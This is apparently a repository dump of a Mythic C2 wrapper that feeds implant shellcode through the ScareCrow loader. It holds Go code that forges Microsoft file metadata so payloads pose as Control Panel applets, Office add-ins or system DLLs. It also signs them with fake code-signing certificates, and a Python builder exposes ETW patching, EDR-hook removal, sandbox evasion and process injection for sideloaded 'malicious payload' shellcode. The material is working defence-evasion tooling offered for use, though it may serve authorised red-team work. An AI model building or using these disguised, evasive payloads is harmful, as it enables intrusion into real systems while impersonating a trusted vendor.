vi.StringFileInfo.CompanyName = "Microsoft Corporation" 865 | vi.StringFileInfo.InternalName = "mmsys.dll" 866 | vi.StringFileInfo.FileDescription = "Audio Control Panel" 867 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 868 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 869 | vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui" 870 | vi.FixedFileInfo.ProductVersion.Patch = 18362 871 | vi.FixedFileInfo.ProductVersion.Major = 10 872 | vi.FixedFileInfo.ProductVersion.Minor = 0 873 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 874 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 875 | vi.FixedFileInfo.FileVersion.Major = 10 876 | vi.FixedFileInfo.FileVersion.Minor = 0 877 | vi.FixedFileInfo.FileVersion.Patch = 18362 878 | vi.FixedFileInfo.FileVersion.Build = 1 879 | vi.StringFileInfo.InternalName = "mmsys.cpl" 880 | } 881 | if name == "ncp" { 882 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 883 | vi.StringFileInfo.InternalName = "ncpa.cpl" 884 | vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub" 885 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 886 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 887 | vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui" 888 | vi.FixedFileInfo.ProductVersion.Patch = 18362 889 | vi.FixedFileInfo.ProductVersion.Major = 10 890 | vi.FixedFileInfo.ProductVersion.Minor = 0 891 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 892 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 893 | vi.FixedFileInfo.FileVersion.Major = 10 894 | vi.FixedFileInfo.FileVersion.Minor = 0 895 | vi.FixedFileInfo.FileVersion.Patch = 18362 896 | vi.FixedFileInfo.FileVersion.Build = 1 897 | vi.StringFileInfo.InternalName = "ncpa.cpl" 898 | } 899 | if name == "power" { 900 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 901 | vi.StringFileInfo.InternalName = "powercfg.cpl" 902 | vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet" 903 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 904 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 905 | vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI" 906 | vi.FixedFileInfo.ProductVersion.Patch = 18362 907 | vi.FixedFileInfo.ProductVersion.Major = 10 908 | vi.FixedFileInfo.ProductVersion.Minor = 0 909 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 910 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 911 | vi.FixedFileInfo.FileVersion.Major = 10 912 | vi.FixedFileInfo.FileVersion.Minor = 0 913 | vi.FixedFileInfo.FileVersion.Patch = 18362 914 | vi.FixedFileInfo.FileVersion.Build = 1 915 | vi.StringFileInfo.InternalName = "powercfg.cpl" 916 | } 917 | if name == "speech" { 918 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 919 | vi.StringFileInfo.InternalName = "sapi.cpl" 920 | vi.StringFileInfo.FileDescription = "Speech UX Control Panel" 921 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 922 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 923 | vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui" 924 | vi.FixedFileInfo.ProductVersion.Patch = 18362 925 | vi.FixedFileInfo.ProductVersion.Major = 10 926 | vi.FixedFileInfo.ProductVersion.Minor = 0 927 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 928 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 929 | vi.FixedFileInfo.FileVersion.Major = 10 930 | vi.FixedFileInfo.FileVersion.Minor = 0 931 | vi.FixedFileInfo.FileVersion.Patch = 18362 932 | vi.FixedFileInfo.FileVersion.Build = 1 933 | vi.StringFileInfo.InternalName = "sapi.cpl" 934 | } 935 | 936 | if name == "system" { 937 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 938 | vi.StringFileInfo.InternalName = "sysdm.cpl" 939 | vi.StringFileInfo.FileDescription = "System Applet for the Control Panel" 940 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 941 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 942 | vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui" 943 | vi.FixedFileInfo.ProductVersion.Patch = 18362 944 | vi.FixedFileInfo.ProductVersion.Major = 10 945 | vi.FixedFileInfo.ProductVersion.Minor = 0 946 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 947 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 948 | vi.FixedFileInfo.FileVersion.Major = 10 949 | vi.FixedFileInfo.FileVersion.Minor = 0 950 | vi.FixedFileInfo.FileVersion.Patch = 18362 951 | vi.FixedFileInfo.FileVersion.Build = 1 952 | vi.StringFileInfo.InternalName = "sysdm.cpl" 953 | } 954 | if name == "Tablet" { 955 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 956 | vi.StringFileInfo.InternalName = "TabletPC.cpl" 957 | vi.StringFileInfo.FileDescription = "Tablet PC Control Panel" 958 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 959 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 960 | vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui" 961 | vi.FixedFileInfo.ProductVersion.Patch = 18362 962 | vi.FixedFileInfo.ProductVersion.Major = 10 963 | vi.FixedFileInfo.ProductVersion.Minor = 0 964 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 965 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 966 | vi.FixedFileInfo.FileVersion.Major = 10 967 | vi.FixedFileInfo.FileVersion.Minor = 0 968 | vi.FixedFileInfo.FileVersion.Patch = 18362 969 | vi.FixedFileInfo.FileVersion.Build = 1 970 | vi.StringFileInfo.InternalName = "TabletPC.cpl" 971 | } 972 | if name == "telephone" { 973 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 974 | vi.StringFileInfo.InternalName = "telephon.cpl" 975 | vi.StringFileInfo.FileDescription = "Telephony Control Panel" 976 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 977 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 978 | vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui" 979 | vi.FixedFileInfo.ProductVersion.Patch = 18362 980 | vi.FixedFileInfo.ProductVersion.Major = 10 981 | vi.FixedFileInfo.ProductVersion.Minor = 0 982 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 983 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 984 | vi.FixedFileInfo.FileVersion.Major = 10 985 | vi.FixedFileInfo.FileVersion.Minor = 0 986 | vi.FixedFileInfo.FileVersion.Patch = 18362 987 | vi.FixedFileInfo.FileVersion.Build = 1 988 | vi.StringFileInfo.InternalName = "telephon.cpl" 989 | } 990 | if name == "datetime" { 991 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 992 | vi.StringFileInfo.InternalName = "timedate.cpl" 993 | vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet" 994 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 995 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 996 | vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui" 997 | vi.FixedFileInfo.ProductVersion.Patch = 18362 998 | vi.FixedFileInfo.ProductVersion.Major = 10 999 | vi.FixedFileInfo.ProductVersion.Minor = 0 1000 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 1001 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 1002 | vi.FixedFileInfo.FileVersion.Major = 10 1003 | vi.FixedFileInfo.FileVersion.Minor = 0 1004 | vi.FixedFileInfo.FileVersion.Patch = 18362 1005 | vi.FixedFileInfo.FileVersion.Build = 1 1006 | vi.StringFileInfo.InternalName = "timedate.cpl" 1007 | } 1008 | if name == "winsec" { 1009 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1010 | vi.StringFileInfo.InternalName = "wscui.cpl" 1011 | vi.StringFileInfo.FileDescription = "Security and Maintenance" 1012 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 1013 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1014 | vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui" 1015 | vi.FixedFileInfo.ProductVersion.Patch = 18362 1016 | vi.FixedFileInfo.ProductVersion.Major = 10 1017 | vi.FixedFileInfo.ProductVersion.Minor = 0 1018 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 1019 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 1020 | vi.FixedFileInfo.FileVersion.Major = 10 1021 | vi.FixedFileInfo.FileVersion.Minor = 0 1022 | vi.FixedFileInfo.FileVersion.Patch = 18362 1023 | vi.FixedFileInfo.FileVersion.Build = 1 1024 | vi.StringFileInfo.InternalName = "wscui.cpl" 1025 | } 1026 | if name == "Timesheet" { 1027 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1028 | vi.StringFileInfo.InternalName = "Timesheet.xll " 1029 | vi.StringFileInfo.FileDescription = "Timesheet ToolPak" 1030 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1031 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1032 | vi.StringFileInfo.OriginalFilename = "Timesheet.xll" 1033 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1034 | vi.FixedFileInfo.ProductVersion.Major = 16 1035 | vi.FixedFileInfo.ProductVersion.Minor = 0 1036 | vi.StringFileInfo.ProductName = "Microsoft Office" 1037 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1038 | vi.FixedFileInfo.FileVersion.Major = 16 1039 | vi.FixedFileInfo.FileVersion.Minor = 0 1040 | vi.FixedFileInfo.FileVersion.Patch = 10001 1041 | vi.FixedFileInfo.FileVersion.Build = 10000 1042 | vi.StringFileInfo.InternalName = "Timesheet.xll" 1043 | } 1044 | if name == "Reports" { 1045 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1046 | vi.StringFileInfo.InternalName = "Reports.xll " 1047 | vi.StringFileInfo.FileDescription = "Report ToolPak" 1048 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1049 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1050 | vi.StringFileInfo.OriginalFilename = "Reports.xll" 1051 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1052 | vi.FixedFileInfo.ProductVersion.Major = 16 1053 | vi.FixedFileInfo.ProductVersion.Minor = 0 1054 | vi.StringFileInfo.ProductName = "Microsoft Office" 1055 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1056 | vi.FixedFileInfo.FileVersion.Major = 16 1057 | vi.FixedFileInfo.FileVersion.Minor = 0 1058 | vi.FixedFileInfo.FileVersion.Patch = 10001 1059 | vi.FixedFileInfo.FileVersion.Build = 10000 1060 | vi.StringFileInfo.InternalName = "Reports.xll" 1061 | } 1062 | if name == "Zoom" { 1063 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1064 | vi.StringFileInfo.InternalName = "Zoom.xll" 1065 | vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak" 1066 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1067 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1068 | vi.StringFileInfo.OriginalFilename = "Zoom.xll" 1069 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1070 | vi.FixedFileInfo.ProductVersion.Major = 16 1071 | vi.FixedFileInfo.ProductVersion.Minor = 0 1072 | vi.StringFileInfo.ProductName = "Microsoft Office" 1073 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1074 | vi.FixedFileInfo.FileVersion.Major = 16 1075 | vi.FixedFileInfo.FileVersion.Minor = 0 1076 | vi.FixedFileInfo.FileVersion.Patch = 10001 1077 | vi.FixedFileInfo.FileVersion.Build = 10000 1078 | vi.StringFileInfo.InternalName = "Zoom.xll" 1079 | } 1080 | if name == "Updates" { 1081 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1082 | vi.StringFileInfo.InternalName = "Updates.xll " 1083 | vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak" 1084 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1085 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1086 | vi.StringFileInfo.OriginalFilename = "Updates.xll" 1087 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1088 | vi.FixedFileInfo.ProductVersion.Major = 16 1089 | vi.FixedFileInfo.ProductVersion.Minor = 0 1090 | vi.StringFileInfo.ProductName = "Microsoft Office" 1091 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1092 | vi.FixedFileInfo.FileVersion.Major = 16 1093 | vi.FixedFileInfo.FileVersion.Minor = 0 1094 | vi.FixedFileInfo.FileVersion.Patch = 10001 1095 | vi.FixedFileInfo.FileVersion.Build = 10000 1096 | vi.StringFileInfo.InternalName = "Updates.xll" 1097 | } 1098 | 1099 | if name == "Calendar" { 1100 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1101 | vi.StringFileInfo.InternalName = "Calendar.xll " 1102 | vi.StringFileInfo.FileDescription = "Calendar ToolPak" 1103 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1104 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1105 | vi.StringFileInfo.OriginalFilename = "Calendar.xll" 1106 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1107 | vi.FixedFileInfo.ProductVersion.Major = 16 1108 | vi.FixedFileInfo.ProductVersion.Minor = 0 1109 | vi.StringFileInfo.ProductName = "Microsoft Office" 1110 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1111 | vi.FixedFileInfo.FileVersion.Major = 16 1112 | vi.FixedFileInfo.FileVersion.Minor = 0 1113 | vi.FixedFileInfo.FileVersion.Patch = 10001 1114 | vi.FixedFileInfo.FileVersion.Build = 10000 1115 | vi.StringFileInfo.InternalName = "Calendar.xll" 1116 | } 1117 | if name == "Memo" { 1118 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1119 | vi.StringFileInfo.InternalName = "Memo.xll " 1120 | vi.StringFileInfo.FileDescription = "Memo ToolPak" 1121 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1122 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1123 | vi.StringFileInfo.OriginalFilename = "Memo.xll" 1124 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1125 | vi.FixedFileInfo.ProductVersion.Major = 16 1126 | vi.FixedFileInfo.ProductVersion.Minor = 0 1127 | vi.StringFileInfo.ProductName = "Microsoft Office" 1128 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1129 | vi.FixedFileInfo.FileVersion.Major = 16 1130 | vi.FixedFileInfo.FileVersion.Minor = 0 1131 | vi.FixedFileInfo.FileVersion.Patch = 10001 1132 | vi.FixedFileInfo.FileVersion.Build = 10000 1133 | vi.StringFileInfo.InternalName = "Memo.xll" 1134 | } 1135 | if name == "Desk" { 1136 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1137 | vi.StringFileInfo.InternalName = "Desk.xll " 1138 | vi.StringFileInfo.FileDescription = "Office Desktop ToolPak" 1139 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1140 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1141 | vi.StringFileInfo.OriginalFilename = "Desk.xll" 1142 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1143 | vi.FixedFileInfo.ProductVersion.Major = 16 1144 | vi.FixedFileInfo.ProductVersion.Minor = 0 1145 | vi.StringFileInfo.ProductName = "Microsoft Office" 1146 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1147 | vi.FixedFileInfo.FileVersion.Major = 16 1148 | vi.FixedFileInfo.FileVersion.Minor = 0 1149 | vi.FixedFileInfo.FileVersion.Patch = 10001 1150 | vi.FixedFileInfo.FileVersion.Build = 10000 1151 | vi.StringFileInfo.InternalName = "Desk.xll" 1152 | } 1153 | 1154 | if name == "Appwiz" { 1155 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1156 | vi.StringFileInfo.InternalName = "Appwiz.xll " 1157 | vi.StringFileInfo.FileDescription = "Application Installer ToolPak" 1158 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1159 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1160 | vi.StringFileInfo.OriginalFilename = "Appwiz.xll" 1161 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1162 | vi.FixedFileInfo.ProductVersion.Major = 16 1163 | vi.FixedFileInfo.ProductVersion.Minor = 0 1164 | vi.StringFileInfo.ProductName = "Microsoft Office" 1165 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1166 | vi.FixedFileInfo.FileVersion.Major = 16 1167 | vi.FixedFileInfo.FileVersion.Minor = 0 1168 | vi.FixedFileInfo.FileVersion.Patch = 10001 1169 | vi.FixedFileInfo.FileVersion.Build = 10000 1170 | vi.StringFileInfo.InternalName = "Appwiz.xll" 1171 | } 1172 | } 1173 | vi.VarFileInfo.Translation.LangID = goversioninfo.LangID(1033) 1174 | vi.VarFileInfo.Translation.CharsetID = goversioninfo.CharsetID(1200) 1175 | 1176 | vi.Build() 1177 | vi.Walk() 1178 | 1179 | var archs []string 1180 | archs = []string{"amd64"} 1181 | for _, item := range archs { 1182 | fileout := "resource_windows.syso" 1183 | if err := vi.WriteSyso(fileout, item); err != nil { 1184 | log.Printf("Error writing syso: %v", err) 1185 | os.Exit(3) 1186 | } 1187 | } 1188 | fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties") 1189 | return name 1190 | } 1191 | 1192 | func Signer(domain string, password string, valid string, inputFile string) { 1193 | outFile := inputFile 1194 | 1195 | if valid != "" { 1196 | fmt.Println("[*] Signing " + inputFile + " With a Valid Cert " + valid) 1197 | os.Rename(inputFile, inputFile+".old") 1198 | inputFile = inputFile + ".old" 1199 | SignExecutable(password, valid, inputFile, outFile) 1200 | 1201 | } else { 1202 | password := VarNumberLength(8, 12) 1203 | pfx := domain + ".pfx" 1204 | fmt.Println("[*] Signing " + inputFile + " With a Fake Cert") 1205 | os.Rename(inputFile, inputFile+".old") 1206 | inputFile = inputFile + ".old" 1207 | GenerateCert(domain, inputFile) 1208 | GeneratePFK(password, domain) 1209 | SignExecutable(password, pfx, inputFile, outFile) 1210 | } 1211 | 1212 | os.Remove(domain + ".pem") 1213 | os.Remove(domain + ".key") 1214 | os.Remove(domain + ".pfx") 1215 | fmt.Println("[+] Signed File Created") 1216 | 1217 | } 1218 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/main.json: -------------------------------------------------------------------------------- 1 | { 2 | "FixedFileInfo": { 3 | "FileVersion": { 4 | "Major": 1, 5 | "Minor": 0, 6 | "Patch": 0, 7 | "Build": 0 8 | }, 9 | "ProductVersion": { 10 | "Major": 1, 11 | "Minor": 0, 12 | "Patch": 0, 13 | "Build": 0 14 | } 15 | }, 16 | "StringFileInfo": { 17 | "CompanyName": "Microsoft Corporation", 18 | "FileDescription": "Microsoft Corporation", 19 | "FileVersion": "Microsoft Corporation", 20 | "InternalName": "test", 21 | "LegalCopyright": "Microsoft Corporation", 22 | "OriginalFilename": "Microsoft Corporation", 23 | "ProductName": "Microsoft Corporation", 24 | "ProductVersion": "Microsoft Corporation" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/agent_functions/__init__.py: -------------------------------------------------------------------------------- 1 | import glob 2 | from os.path import basename 3 | 4 | # Get file paths of all modules. 5 | modules = glob.glob("agent_functions/*.py") 6 | __all__ = [basename(x)[:-3] for x in modules if x != "__init__.py"] 7 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/agent_functions/builder.py: -------------------------------------------------------------------------------- 1 | from mythic_payloadtype_container.PayloadBuilder import * 2 | from mythic_payloadtype_container.MythicCommandBase import * 3 | import asyncio 4 | import os 5 | import tempfile 6 | from distutils.dir_util import copy_tree 7 | import base64 8 | 9 | 10 | class ScarecrowWrapper(PayloadType): 11 | name = "scarecrow_wrapper" 12 | file_extension = "exe" 13 | author = "Kyle Avery" 14 | supported_os = [SupportedOS.Windows] 15 | wrapper = True 16 | wrapped_payloads = [] 17 | note = "" 18 | supports_dynamic_loading = False 19 | build_parameters = { 20 | "loader": BuildParameter( 21 | name="loader", 22 | parameter_type=BuildParameterType.ChooseOne, 23 | description="Loader - Sets the type of process that will sideload the malicious payload. Note: Binary, Control, and DLL loaders require shellcode as input while Excel, Msiexec, and Wscript loaders require a PE file.", 24 | choices=["control", "binary", "dll"], 25 | ), 26 | "etw": BuildParameter( 27 | name="etw", 28 | parameter_type=BuildParameterType.ChooseOne, 29 | description="ETW - Enables ETW patching to prevent ETW events from being generated.", 30 | choices=["true", "false"], 31 | ), 32 | "console": BuildParameter( 33 | name="console", 34 | parameter_type=BuildParameterType.ChooseOne, 35 | description="Console (Only for Binary Payloads) - Generates verbose console information when the payload is executed. This will disable the hidden window feature.", 36 | choices=["true", "false"], 37 | ), 38 | "sandbox": BuildParameter( 39 | name="sandbox", 40 | parameter_type=BuildParameterType.ChooseOne, 41 | description="Sandbox - Enables sandbox evasion using IsDomainedJoined calls.", 42 | choices=["true", "false"], 43 | ), 44 | "unmodified": BuildParameter( 45 | name="unmodified", 46 | parameter_type=BuildParameterType.ChooseOne, 47 | description="Unmodified - (Only for DLL Payloads) When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.", 48 | choices=["true", "false"], 49 | default_value="false", 50 | ), 51 | "injection": BuildParameter( 52 | name="injection", 53 | parameter_type=BuildParameterType.String, 54 | required=False, 55 | description="Injection - Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).", 56 | default_value="", 57 | ), 58 | "domain": BuildParameter( 59 | name="domain", 60 | required=True, 61 | parameter_type=BuildParameterType.String, 62 | description="Domain - The domain name to use for creating a fake code signing cert.", 63 | default_value="www.acme.com", 64 | ), 65 | } 66 | c2_profiles = [] 67 | 68 | async def build(self) -> BuildResponse: 69 | # this function gets called to create an instance of your payload 70 | resp = BuildResponse(status=BuildStatus.Error) 71 | output = "" 72 | try: 73 | if(self.get_parameter("loader") != "dll" and self.get_parameter("unmodified") == "true"): 74 | resp.build_stderr = "Cannot use Unmodified option with a loader type other than DLL!" 75 | return resp 76 | agent_build_path = tempfile.TemporaryDirectory(suffix=self.uuid).name 77 | # shutil to copy payload files over 78 | copy_tree(self.agent_code_path, agent_build_path) 79 | working_path = "{}/original.exe".format(agent_build_path) 80 | output_path ="{}/output.exe".format(agent_build_path) 81 | 82 | with open(str(working_path), "wb") as f: 83 | f.write(base64.b64decode(self.wrapped_payload)) 84 | with open(str(working_path), "rb") as f: 85 | header = f.read(2) 86 | if header == b"\x4d\x5a": # if PE file 87 | resp.build_stderr = "Supplied payload is a PE instead of raw shellcode." 88 | return resp 89 | 90 | command = "cd {}/ScareCrow/; go build; chmod +x ScareCrow; ./ScareCrow ".format(agent_build_path, agent_build_path) 91 | command += "-I {} -Loader {}{}{}{}{}{}".format( 92 | working_path, 93 | self.get_parameter("loader"), 94 | " -etw" if self.get_parameter("etw") == "true" else "", 95 | " -console" if self.get_parameter("console") == "true" else "", 96 | " -injection {}".format(self.get_parameter("injection")) if self.get_parameter("injection") != "" else "", 97 | " -domain {}".format(self.get_parameter("domain")) if self.get_parameter("domain") != "" else "", 98 | " -sandbox" if self.get_parameter("sandbox") == "true" else "", 99 | " -unmodified" if self.get_parameter("unmodified") == "true" else "", 100 | ) 101 | 102 | proc = await asyncio.create_subprocess_shell( 103 | command, 104 | stdout=asyncio.subprocess.PIPE, 105 | stderr=asyncio.subprocess.PIPE, 106 | cwd=agent_build_path, 107 | ) 108 | stdout, stderr = await proc.communicate() 109 | if stdout: 110 | output += f"[stdout]\n{stdout.decode()}" 111 | if stderr: 112 | output += f"[stderr]\n{stderr.decode()}" 113 | 114 | if(self.get_parameter("loader") == "control"): 115 | names = ["appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"] 116 | extension = ".cpl" 117 | elif(self.get_parameter("loader") == "binary"): 118 | names = ["Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"] 119 | extension = ".exe" 120 | elif(self.get_parameter("loader") == "dll"): 121 | names = ["apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"] 122 | extension = ".dll" 123 | 124 | for name in names: 125 | output_name = name + extension 126 | output_path = "{}/ScareCrow/{}".format(agent_build_path, output_name) 127 | if os.path.exists(output_path): 128 | resp.payload = open(output_path, "rb").read() 129 | resp.status = BuildStatus.Success 130 | resp.build_message = "Command: " + command + "\n" + "New ScareCrow payload created! - {}".format(output_name) 131 | return resp 132 | resp.payload = b"" 133 | resp.build_stderr = "Failed, output: " + output + "\n Output path: " + output_path 134 | except Exception as e: 135 | raise Exception(str(e) + "\n" + output) 136 | return resp 137 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/mythic_service.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from mythic_payloadtype_container import mythic_service 3 | mythic_service.start_service_and_heartbeat() 4 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/payload_service.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd /Mythic/mythic 4 | 5 | export PYTHONPATH=/Mythic:/Mythic/mythic 6 | 7 | python3.8 mythic_service.py 8 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/rabbitmq_config.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "mythic_user", 3 | "password": "mythic_password", 4 | "virtual_host": "mythic_vhost", 5 | "host": "127.0.0.1", 6 | "name": "hostname", 7 | "container_files_path": "/Mythic/" 8 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ScareCrow Wrapper 2 | A wrapper payload for [Mythic](https://github.com/its-a-feature/Mythic) that wraps any agent shellcode with the [ScareCrow](https://github.com/optiv/ScareCrow) loader. This wrapper currently supports CPL, EXE, and DLL payload types from ScareCrow. 3 | 4 | ## Usage 5 | In Mythic, go to Create Components > Create Wrapper and then select "scarecrow_wrapper". Select/input the desired configuration options, and then select the payload you would like to wrap. Once the generation is complete, go to Operational Views > Created Payloads to download the output file. The intended filename can be seen in Payload Actions > View Build Message. 6 | 7 | ## How to install an agent in this format within Mythic 8 | 9 | When it's time for you to test out your install or for another user to install your agent, it's pretty simple. Within Mythic you can run the `mythic-cli` binary to install this in one of three ways: 10 | 11 | * `sudo ./mythic-cli install github https://github.com/user/repo` to install the main branch 12 | * `sudo ./mythic-cli install github https://github.com/user/repo branchname` to install a specific branch of that repo 13 | * `sudo ./mythic-cli install folder /path/to/local/folder/cloned/from/github` to install from an already cloned down version of an agent repo 14 | 15 | Now, you might be wondering _when_ should you or a user do this to properly add your agent to their Mythic instance. There's no wrong answer here, just depends on your preference. The three options are: 16 | 17 | * Mythic is already up and going, then you can run the install script and just direct that agent's containers to start (i.e. `sudo ./mythic-cli payload start agentName` and if that agent has its own special C2 containers, you'll need to start them too via `sudo ./mythic-cli c2 start c2profileName`). 18 | * Mythic is already up and going, but you want to minimize your steps, you can just install the agent and run `sudo ./mythic-cli mythic start`. That script will first _stop_ all of your containers, then start everything back up again. This will also bring in the new agent you just installed. 19 | * Mythic isn't running, you can install the script and just run `sudo ./mythic-cli mythic start`. 20 | 21 | -------------------------------------------------------------------------------- /agent_icons/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/agent_icons/.keep -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "exclude_payload_type": false, 3 | "exclude_c2_profiles": false, 4 | "exclude_documentation_payload": false, 5 | "exclude_documentation_c2": false, 6 | "exclude_agent_icons": false 7 | } 8 | -------------------------------------------------------------------------------- /documentation-c2/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-c2/.keep -------------------------------------------------------------------------------- /documentation-payload/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-payload/.keep -------------------------------------------------------------------------------- /documentation-wrapper/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-wrapper/.keep 